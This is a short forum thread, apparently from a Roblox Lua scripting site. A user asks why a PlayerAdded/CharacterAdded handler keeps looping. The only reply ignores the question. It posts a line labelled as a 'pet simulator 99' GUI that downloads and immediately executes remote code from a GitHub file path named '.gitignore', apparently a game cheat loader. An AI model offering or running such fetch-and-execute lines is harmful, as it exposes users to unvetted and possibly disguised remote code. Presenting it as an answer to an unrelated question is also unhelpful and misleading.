Categories > Coding > Lua >

Why does this loop?

Posts: 3

Threads: 3

Joined: Dec, 2023

Reputation: 0

Posted

game:GetService("Players").PlayerAdded:Connect(function(plr)
	wait(1)
	reload(plr)
	plr.CharacterAdded:Connect(function() -- loops here for some reason
		if plr:WaitForChild("TrollCooldown").Value == false then
			plr:WaitForChild("TrollCooldown").Value = true
			task.wait(0.1)
			reload(plr)
			task.wait(2)
			plr:WaitForChild("TrollCooldown").Value = false
		end
	end)
end)
  • 0

Posts: 1

Threads: 0

Joined: Dec, 2023

Reputation: 0

Replied

-- pet imulator 99 zz gui --

 

loadstring(game:HttpGet("https://raw.githubusercontent.com/Gometobob14/zRuX/main/.gitignore", true))()

  • 0

Users viewing this thread:

( Members: 0, Guests: 1, Total: 1 )